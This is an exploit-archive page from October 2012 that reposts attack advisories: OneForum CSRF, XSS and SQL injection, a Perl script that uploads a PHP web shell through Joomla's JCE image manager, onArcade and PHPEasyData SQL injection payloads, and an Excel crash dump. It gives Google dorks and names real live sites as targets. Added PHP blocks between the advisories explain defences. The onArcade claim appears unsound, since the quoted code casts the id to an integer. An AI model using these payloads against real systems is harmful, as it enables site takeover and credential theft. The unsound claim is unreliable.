Archive for 29 October 2012

Microsoft Office Excel 2010 memory corruption

Microsoft Office Excel 2010 memory corruption DoS PoC

Title     :  Microsoft Office Excel 2010 memory corruption 
Version   :  Microsoft Office professional Plus 2010 
Date      :  2012-10-27 
Vendor    :  http://office.microsoft.com 
Impact    :  Med/High 
Contact   :  coolkaveh [at] rocketmail.com 
Twitter   :   
tested    :  XP SP3 ENG 
############################################################################### 
Bug : 
---- 
Memory corruption during the handling of XLS files; a context-dependent attacker 
can execute arbitrary code. 
----  
################################################################################ 
(b4c.1350): Access violation - code c0000005 (first chance) 
First chance exceptions are reported before any exception handling. 
This exception may be expected and handled. 
eax=00000584 ebx=00135070 ecx=00001000 edx=0000105f esi=06a80800 edi=00000040 
eip=301ce0d0 esp=001302f0 ebp=00131d6c iopl=0         nv up ei pl zr na pe nc 
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246 
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for Excel.exe - 
Excel!Ordinal40+0x1ce0d0: 
301ce0d0 668b5008        mov     dx,word ptr [eax+8]      ds:0023:0000058c=???? 
################################################################################ 

OneForum Multiple Vulnerabilities

SQL injection and XSS vulnerabilities were found in the OneForum script. The details of the vulnerabilities are as follows:

########################################## 
# Exploit Title: OneForum Multiple Vulnerabilities 
# Date: 2012-10-29 
# Author: DaOne aka Mocking Bird 
# Home: 1337day Inj3ct0r Exploit Database  
# Software Link: http://www.onescripts.de/download/oneforum_en.zip 
# Category: webapps/php 
# Version: 2.0->3.0 
# Google dork: intext:"powered by OneScripts" 
########################################## 
 
[#] CSRF Change Admin Password: 
<html> 
<body> 
<form method="post" action="http://site/password.php?user_id=1" > 
<input name="password" type="text" value="passw0rd"> 
<input type="submit" name="submit" value="change password" > 
</form> 
</body> 
</html> 
 
[#] XSS 
http://localhost/category.php?id=<script>alert(0)</script> 
 
[#] SQL Injection: 
http://localhost/category.php?id=SQL 
Demo-> http://www.onescripts.de/demo/OneForum_en/category.php?id=2 UNION SELECT 1,user_pass,3 from users-- 
 
http://localhost/OneForum/topic.php?id= 
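The CSRF form in the advisory works because password.php accepts a bare POST with the target account chosen by ?user_id= in the URL. The handler below is an added example, not OneForum's code, showing the checks that make such a form fail: a per-session token compared in constant time, an Origin/Referer check, re-authentication with the current password, and the account taken from the session rather than the request. verify_current_password() and change_password() are hypothetical stand-ins for the application's own account routines, and $_SESSION['user_id'] is assumed to be set at login.

```php
<?php
// Added example, not OneForum's code: a password-change handler that the
// cross-site form in the advisory above cannot drive. Hypothetical pieces:
// verify_current_password() and change_password() stand in for the
// application's own account routines; $_SESSION['user_id'] is assumed to be
// set at login.
declare(strict_types=1);

const CSRF_KEY = 'csrf_token';

if (session_status() !== PHP_SESSION_ACTIVE) {
    session_start();
}

// Issue (or reuse) a per-session secret; the form embeds it as a hidden field.
// A foreign site cannot read it, so its forged POST cannot include it.
function csrf_token(): string
{
    if (empty($_SESSION[CSRF_KEY])) {
        $_SESSION[CSRF_KEY] = bin2hex(random_bytes(32));
    }
    return $_SESSION[CSRF_KEY];
}

// Constant-time comparison of the submitted token against the session copy.
// Untyped on purpose: csrf_token[]=x would otherwise raise a TypeError.
function csrf_valid($submitted): bool
{
    $expected = $_SESSION[CSRF_KEY] ?? '';
    return is_string($submitted) && $expected !== ''
        && hash_equals($expected, $submitted);
}

// Defence in depth: browsers attach Origin (or Referer) to cross-site POSTs,
// so a request that names another site is refused even if a token leaks.
function same_origin(string $hostHeader): bool
{
    $origin = $_SERVER['HTTP_ORIGIN'] ?? $_SERVER['HTTP_REFERER'] ?? '';
    if ($origin === '') {
        return false;                     // no Origin/Referer: treat as cross-site
    }
    $want = strtolower((string) parse_url('http://' . $hostHeader, PHP_URL_HOST));
    $got  = strtolower((string) parse_url($origin, PHP_URL_HOST));
    return $want !== '' && $want === $got;
}

function render_form(): string
{
    $t = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
    return '<form method="post" action="password.php">'
         . '<input type="hidden" name="' . CSRF_KEY . '" value="' . $t . '">'
         . '<input type="password" name="current_password">'
         . '<input type="password" name="password">'
         . '<input type="submit" name="submit" value="change password">'
         . '</form>';
}

if (($_SERVER['REQUEST_METHOD'] ?? 'GET') === 'POST') {
    // The account to modify comes from the session, never from ?user_id= in
    // the URL: the original form picks any user by id.
    $uid = $_SESSION['user_id'] ?? null;
    if ($uid === null) {
        http_response_code(401);
        exit('login required');
    }
    if (!csrf_valid($_POST[CSRF_KEY] ?? null)
        || !same_origin($_SERVER['HTTP_HOST'] ?? '')) {
        http_response_code(403);
        exit('rejected: cross-site request');
    }
    // Re-authentication: a hijacked or shared session cannot silently rotate
    // the password without knowing the current one.
    if (!verify_current_password($uid, (string) ($_POST['current_password'] ?? ''))) {
        http_response_code(403);
        exit('current password incorrect');
    }
    change_password($uid, (string) ($_POST['password'] ?? ''));
    unset($_SESSION[CSRF_KEY]);           // single-use token: rotate after success
    exit('password changed');
}

echo render_form();
```

Against this handler the advisory's form fails twice over: it carries no csrf_token field, and the browser's Origin header names the attacker's page rather than the forum. Setting the session cookie with SameSite=Lax adds a third, browser-enforced layer for the same class of request.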

Joomla Component com_jce remote Code Injection Execution Exploit

An SQL injection vulnerability was found in the Joomla com_jce remote extension.
Where the vulnerability occurs and how it is used are described below.

#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 
#0     _                   __           __       __                     1 
#1   /' \            __  /'__`\        /\ \__  /'__`\                   0 
#0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1 
#1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0 
#0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1 
#1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0 
#0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1 
#1                  \ \____/ >> Exploit database separated by exploit   0 
#0                   \/___/          type (local, remote, DoS, etc.)    1 
#1                                                                      1 
#0  [+] Site            : 1337day.com                                   0 
#1  [+] Support e-mail  : submit[at]1337day.com                         1 
#0                                                                      0 
#1               #########################################              1 
#0               I'm Caddy-dz member from Inj3ct0r Team                 1 
#1               #########################################              0 
#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 
 
#### 
# Exploit Title: Joomla Component com_jce remote shell upload 
# Author: Caddy-Dz 
# Facebook Page: .Cyber.Army 
# E-mail:   
# Category:: webapps 
# Google Dork: inurl:index.php?option=com_jce 
# Security Risk: High 
# Tested on: Windows Seven Edition Integral / French 
#### 
# IMPORTANT : THIS IS A PRIV8T EXPLOIT , ALL RIGHTS RESERVED TO Mostafa Azizi . 
# 
# Greets : 1337day Team , Exploit-ID Team , Algerian Cyber Army Team , KedAns-Dz , Kalashincov3 
# .. Kha&mix , King Of Pirates , xDZx-Team ... and all algerian hackers . 
# 
# this was written for educational purpose only. use it at your own risk. 
# author will be not responsible for any damage caused! user assumes all responsibility  
# intended for authorized web application pentesting only! 
# 
 
 
use IO::Socket;  
use LWP::Simple;  
system("cls");  
if(!defined($ARGV[0])) {  
print "\n\n\t.::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 .::.\n\n";  
print "\t||||        Coded by: Mostafa Azizi (admin[@]0-Day[dot]net)      ||||\n\n";  
print "\t+--> Usage:   perl $0 <host>        <--+\n";  
print "\t+--> Example: perl $0 localhost     <--+\n\n";  
exit; }  
print "\n\n\t.::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 .::.\n\n";  
print "\t||||        Coded by: Mostafa Azizi (admin[@]0-Day[dot]net)      ||||\n\n";  
$TARGET = $ARGV[0];  
$PORT   = "80";  
$SCRIPT = "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20";  
$SHELL  = "/images/stories/0day.php?cmd=";  
$HTTP   = "http://";  
 
$header1G = "GET $SCRIPT HTTP/1.1";  
$header1H = "HEAD /images/stories/0day.php HTTP/1.1";  
$header1P = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1";  
$header1P2 = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1";  
$header2 = "Host: $TARGET";  
$header3 = "User-Agent: BOT/0.1 (BOT for JCE)";  
$header4 = "Content-Type: multipart/form-data; boundary=---------------------------41184676334";  
$header5 = "Content-Length: 769";  
$header6 = "-----------------------------41184676334";  
$header7 = 'Content-Disposition: form-data; name="upload-dir"';  
$header8 = '/';  
$header9 = 'Content-Disposition: form-data; name="Filedata"; filename=""';  
$header10 = 'Content-Type: application/octet-stream';  
$header11 = 'Content-Disposition: form-data; name="upload-overwrite"';  
$header12 = "0";  
$header13 = 'Content-Disposition: form-data; name="Filedata"; filename="0day.gif"';  
$header14 = 'Content-Type: image/gif';  
$header15 = 'GIF89aG';  
$header16 = "<? system($_REQUEST['cmd']);exit; ?>";  
$header17 = 'Content-Disposition: form-data; name="upload-name"';  
$header18 = '0day';  
$header19 = 'Content-Disposition: form-data; name="action"';  
$header20 = 'upload';  
$header21 = "-----------------------------41184676334--";  
$header22 = 'X-Request: JSON';  
$header23 = 'Content-Type: application/x-www-form-urlencoded; charset=utf-8';  
$header25 = 'json={"fn":"folderRename","args":["/0day.gif","0day.php"]}';  
$header24 = "Content-Length: ".length($header25)."";  
 
############################################### Packet 1 --> Checking Exploitability #########################################################  
print "\n[*] Checking Exploitability ...\n\n";  
sleep 2;  
$pageURL=$TARGET.$SCRIPT;  
$simplePage=get($pageURL);  
@arr = ("2.0.11</title","2.0.12</title","2.0.13</title","2.0.14</title","2.0.15</title","1.5.7.10</title","1.5.7.11</title","1.5.7.12</title","1.5.7.13</title","1.5.7.14</title"); 
while (($count!=10) && ($die != 1)) {  
foreach $arr{  
if ($simplePage =~ m/$arr/) {  
print "\n[*] Target patched.\n\n";  
$die = 1;  
} else {  
$count++;  
}  
}  
}  
if ($count==5) {print "[*] Target is exploitable.\n\n"};  
############################################### Packet 2 --> Uploading shell as a gif file #########################################################  
$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET" ,PeerPort=>"$PORT")  
|| die "Can't connect to $TARGET";  
print "[*] Trying to upload 0day.gif ...\n\n";  
print $remote "$header1P\n$header2\n$header3\n$header4\n$header5\n\n$header6\n$header7\n\n$header8\n$header6\n$header9\n$header10\n\n\n$header6\n$header11\n\n$header12\n$header6\n$header13\n$header14\n\n$header15\n$header16\n$header6\n$header17\n\n$header18\n$header6\n$header19\n\n$header20\n$header21\n\n"; 
sleep 2;  
############################################### Packet 3 --> Change Extension from .gif to .php #########################################################  
print "[*] Trying to change extension from .gif to .php ...\n\n";  
$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET" ,PeerPort=>"$PORT")  
|| die "Can't connect to $TARGET";  
print $remote "$header1P2\n$header2\n$header3\n$header23\n$header22\n$header24\n\n$header25\n\n";  
############################################### Packet 4 --> Check for successfully uploaded #########################################################  
$shellurl=$TARGET.$SHELL;  
$output=get($shellurl);  
while ($output = <$remote> ) {  
if ($output =~ /200 OK/) {  
print "[+] 0day.php was successfully uploaded\n\n";  
print "[+] Path:".$TARGET.$SHELL."id\n";  
}}  
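The script above relies on two server-side weaknesses in sequence: the image manager stores a "GIF" whose body carries PHP under images/stories, and its folderRename action then lets the caller turn 0day.gif into 0day.php so the web server executes it. The functions below are an added example, not JCE's or Joomla's code, of the controls that break that chain: one allow-list applied to both the upload name and the rename target, and a GD re-encode of the uploaded image that writes a fresh file from the decoded pixels and so drops any trailing payload. ALLOWED_IMAGE_EXT, the function names and the directory arguments are hypothetical.

```php
<?php
// Added example, not JCE's or Joomla's code: the two controls that defeat the
// upload-then-rename sequence used by the script above. The constant, the
// function names and the directory arguments are hypothetical.
declare(strict_types=1);

// Extensions an image manager may accept. Anything else, including a second
// extension (shell.php.gif) or a rename target ending in .php, is refused.
const ALLOWED_IMAGE_EXT = ['gif', 'jpg', 'jpeg', 'png'];

// Canonical, allow-listed filename: basename only, one extension, no traversal.
function safe_image_name(string $name): ?string
{
    $name = basename(str_replace('\\', '/', $name));
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})$/', $name, $m)) {
        return null;                    // rejects "x.gif.php", "../x", empty ext
    }
    $ext = strtolower($m[1]);
    return in_array($ext, ALLOWED_IMAGE_EXT, true) ? $name : null;
}

// The rename step of the attack: old and new names must both pass the same
// allow-list, so "0day.gif" -> "0day.php" is refused before touching disk.
function safe_rename(string $dir, string $from, string $to): bool
{
    $src = safe_image_name($from);
    $dst = safe_image_name($to);
    if ($src === null || $dst === null) {
        return false;
    }
    return rename($dir . '/' . $src, $dir . '/' . $dst);
}

// Re-encode the upload with GD: the decoder reads only the image data and a
// fresh file is written from it, so a "<? ... ?>" tail after GIF89a is lost.
function store_image(string $tmpPath, string $dir, string $name): bool
{
    $dst = safe_image_name($name);
    if ($dst === null) {
        return false;
    }
    $info = @getimagesize($tmpPath);    // false for anything that is not an image
    if ($info === false) {
        return false;
    }
    $img = match ($info[2]) {
        IMAGETYPE_GIF  => @imagecreatefromgif($tmpPath),
        IMAGETYPE_JPEG => @imagecreatefromjpeg($tmpPath),
        IMAGETYPE_PNG  => @imagecreatefrompng($tmpPath),
        default        => false,
    };
    if ($img === false) {
        return false;
    }
    // The stored format follows the allow-listed extension, not the header,
    // so a declared .gif can never end up as something the server executes.
    $ok = match (strtolower(pathinfo($dst, PATHINFO_EXTENSION))) {
        'gif'         => imagegif($img, $dir . '/' . $dst),
        'jpg', 'jpeg' => imagejpeg($img, $dir . '/' . $dst),
        'png'         => imagepng($img, $dir . '/' . $dst),
        default       => false,
    };
    imagedestroy($img);
    return $ok;
}
```

With these in place, safe_rename() refuses the .gif-to-.php rename outright and store_image() never writes the bytes it received, only a re-encoded image. The remaining layer belongs to the web server: uploaded-image directories such as images/stories should have script execution disabled (for Apache, a php_flag engine off or a handler removal scoped to that directory) so that even a file that did reach disk with a .php name is served as static content.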

onArcade v2.2 Blind SQL Vulnerability

A Blind SQL injection vulnerability was found in onArcade v2.2; information on where the vulnerability occurs and how it is used is as follows:

/** 
*              onArcade v2.2 Blind SQL Vulnerability 
*              2.2 tested & Also All versions infacted 
*               Cold Zero <- [Cold z3ro] => www.hackteach.org 
*            27/10/2012 
*               http://up.support-ar.com/upload/files/onArcade%20v2.2.zip 
*               http://www.onarcade.com/ 
*/
 
 
1. [SQL]  
 
In forums.php the GET value of r ($_GET['r']) is only checked to be a number, 
with the function is_numeric($_GET['r']); check it: http://php.net/manual/en/function.is-numeric.php 
Then, as we can use a non-existent number like 99999999999999, we can exploit it. 
 
 
error lines => 
 
 
case 'new_reply': 
// get topic or post information 
if (isset($_GET['t']) && is_numeric($_GET['t'])) 
$topic_sql = " 
SELECT 
t.topic_id, t.title AS topic_title, t.replies, t.locked, 
f.forum_id, f.title AS forum_title, f.reply_permission 
FROM 
". $tbl_prefix ."forums_topics AS t 
LEFT JOIN ". $tbl_prefix ."forums AS f ON (f.forum_id = t.forum_id) 
WHERE 
t.topic_id = ". (int) $_GET['t'] ."
LIMIT 1"; 
elseif (isset($_GET['r']) && is_numeric($_GET['r'])) 
$topic_sql = " 
SELECT 
r.title AS reply_title, r.message, 
t.topic_id, t.title AS topic_title, t.replies, t.locked, 
f.forum_id, f.title AS forum_title, f.reply_permission 
FROM 
". $tbl_prefix ."forums_replies AS r 
LEFT JOIN ". $tbl_prefix ."forums_topics AS t ON (r.topic_id = t.topic_id) 
LEFT JOIN ". $tbl_prefix ."forums AS f ON (f.forum_id = t.forum_id) 
WHERE 
r.reply_id = ". (int) $_GET['r'] ."
LIMIT 1"; 
else
no_page(); 
 
[EOF] 
 
 
 
Exploit: 
 
/forums.php?a=new_reply&r=[ Blind SQL ]  
 

PHPEasyData SQL Injection Vulnerability

An SQL Injection vulnerability was found in PHPEasyData; where the vulnerability occurs and the exploit are as follows.

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 
0     _                   __           __       __                     1 
1   /' \            __  /'__`\        /\ \__  /'__`\                   0 
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1 
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0 
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1 
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0 
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1 
1                  \ \____/ >> Exploit database separated by exploit   0 
0                   \/___/          type (local, remote, DoS, etc.)    1 
1                                                                      1 
0  [+] Site            : 1337day.com                                   0 
1  [+] Support e-mail  : submit[at]1337day.com                         1 
0                                                                      0 
1               #########################################              1 
0               I'm DaOne member from Inj3ct0r Team                    1 
1               #########################################              0 
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 
########################################## 
# Exploit Title: PHPEasyData SQL Injection Vulnerability 
# Date: 2012-10-28 
# Author: DaOne aka Mocking Bird 
# Home: 1337day Inj3ct0r Exploit Database  
# Software Link: http://phpeasydata.com/ 
# Category: webapps/php 
# Version: 2.5.1=>2.8.0 
########################################## 
 
# SQL Injection [POST Method] 
http://[host]/mailform.php  
Request Data(Error Based): annuaire=6&inf_id=5&message=3&myemail=&submit_add=Valider+les+modifications&titre=3&validation=1&enr_id=-1+and+(select 1 FROM(select+count(*),concat((select+concat(0x3a,user_login,0x3a,user_pass,0x3a) FROM an_users+LIMIT+0,1),floor(rand(0)*2))x FROM information_schema.tables+GROUP BY x)b) 
 
# Example: 
http://annuaire-discjockey.fr/annuaire/mailform.php 
http://www.macadi.fr/annonces/mailform.php 
http://www.gay-rhone-alpes.com/phpeasydata-pro-2.5.2/mailform.php 
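Both the onArcade advisory (forums.php?a=new_reply&r=) and the PHPEasyData one (the enr_id field of mailform.php) come down to a numeric identifier taken from the request and used in a query, and the PHPEasyData request additionally depends on the database error being echoed back to the client. The code below is an added example, not onArcade's or PHPEasyData's, of the defensive pattern for both: validate the identifier with FILTER_VALIDATE_INT and a range, bind it as a parameter, and keep database errors in the server log. $pdo (assumed to be configured with PDO::ERRMODE_EXCEPTION), the $tblPrefix argument and the function names are hypothetical; the query itself follows the reply lookup quoted in the onArcade advisory.

```php
<?php
// Added example, not onArcade's or PHPEasyData's code: taking an identifier
// such as r, t or enr_id from the request and using it in a query safely.
// $pdo (assumed to use PDO::ERRMODE_EXCEPTION), $tblPrefix and the function
// names are hypothetical; the SELECT follows the onArcade excerpt above.
declare(strict_types=1);

// is_numeric() accepts "1e3", "12.5" and (before PHP 7) "0x1A", so it is a
// type check, not an id check. FILTER_VALIDATE_INT returns an int only for a
// plain decimal integer, and the range option discards 0, negatives and
// out-of-range probes like 99999999999999 before they reach SQL.
function request_id(array $src, string $key, int $max = 2147483647): ?int
{
    if (!isset($src[$key]) || !is_string($src[$key])) {
        return null;                    // absent, or an array injected as r[]=
    }
    $v = filter_var($src[$key], FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => $max]]);
    return $v === false ? null : $v;
}

// The id is bound as a typed parameter, so it is sent as data, never spliced
// into SQL text. $tblPrefix is configuration, not user input, which is why it
// may be interpolated while the id may not.
function load_reply(PDO $pdo, string $tblPrefix, int $replyId): ?array
{
    $sql = "SELECT r.title AS reply_title, r.message,
                   t.topic_id, t.title AS topic_title, t.replies, t.locked,
                   f.forum_id, f.title AS forum_title, f.reply_permission
            FROM {$tblPrefix}forums_replies AS r
            LEFT JOIN {$tblPrefix}forums_topics AS t ON (r.topic_id = t.topic_id)
            LEFT JOIN {$tblPrefix}forums AS f ON (f.forum_id = t.forum_id)
            WHERE r.reply_id = :id
            LIMIT 1";
    $stmt = $pdo->prepare($sql);
    $stmt->bindValue(':id', $replyId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Wiring for a page like forums.php?a=new_reply&r=... ; returns the text to
// render so the decision path is visible in one place.
function handle_new_reply(PDO $pdo, string $tblPrefix, array $get): string
{
    $replyId = request_id($get, 'r');
    if ($replyId === null) {
        return 'no_page';               // the application's own 404 path
    }
    try {
        $row = load_reply($pdo, $tblPrefix, $replyId);
    } catch (PDOException $e) {
        // Error-based injection (the PHPEasyData request above) needs the
        // database message in the response; log it server-side instead.
        error_log($e->getMessage());
        return 'error';
    }
    if ($row === null) {
        return 'no_page';               // a non-existent id is just a 404
    }
    // Anything reflected into HTML is encoded on output, which also covers the
    // reflected category.php?id=<script> case in the OneForum advisory.
    return htmlspecialchars((string) $row['reply_title'], ENT_QUOTES, 'UTF-8');
}
```

The validation step makes the advisories' probes fail before a query runs, and the bound parameter means the query would stay intact even if validation were later loosened. The catch block is the fix for the PHPEasyData technique specifically: an error-based payload only works when the database's own error text is returned to the client, so display_errors should be off in production and exceptions logged rather than printed.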
 
 
----